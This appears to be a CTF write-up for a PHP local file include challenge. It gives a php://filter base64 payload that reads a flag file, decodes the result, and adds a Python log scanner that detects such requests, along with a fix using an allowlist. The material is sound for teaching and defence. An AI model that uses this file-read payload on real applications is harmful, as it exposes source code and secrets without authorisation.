As the name suggests, this is a local file include (LFI) challenge. I covered this before in my earlier notes (notes taken while playing CTFs (PHP)).
payload: ?file=php://filter/read=convert.base64-encode/resource=flag

Then base64-decode the response to get:

<?php
    // this is the real flag!
    // congratulations!
    $flag = urldecode(base64_decode('bnVhYWN0ZiU3QnRyeWluZ18yX3VzZV9MRklfeWVhaF8lMjElN0Q='));
?>
nuaactf{this_is_the_fake_flag}
<br><br>
Sorry, this is not the real flag.

Decoding '$flag' then gives the flag.
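
From the defender's side, a request like the payload above is easy to spot in web server logs. The following is an added example, not part of the original notes: it scans access-log lines for query parameters that carry a php://filter wrapper and reports the filter chain and the target resource. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in common log format (not from the original notes).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?file=about HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=flag HTTP/1.1" 200 340',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?file=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag HTTP/1.1" 200 340',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Captures the filter chain and the resource of a php://filter URL.
FILTER_RE = re.compile(r'^php://filter/(.*?)/?resource=(.*)$', re.IGNORECASE | re.DOTALL)


def fully_unquote(value, max_rounds=5):
    """Normalize a value that proxies or log pipelines may have re-encoded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_filter_reads(lines):
    """Return (client, parameter, filter chain, resource) for each php://filter hit."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl already percent-decodes each value once.
        for name, value in parse_qsl(query, keep_blank_values=True):
            found = FILTER_RE.match(fully_unquote(value).strip())
            if found:
                hits.append((line.split()[0], name, found.group(1), found.group(2)))
    return hits


if __name__ == "__main__":
    for hit in find_filter_reads(SAMPLE_LOG):
        print("php://filter read: client=%s param=%s filters=%s resource=%s" % hit)
```

A hit on a parameter that feeds include() means the application passes user input to the file loader unchanged; the fix belongs in the code (map the parameter to a fixed allowlist of files), and the log rule only tells you where to look.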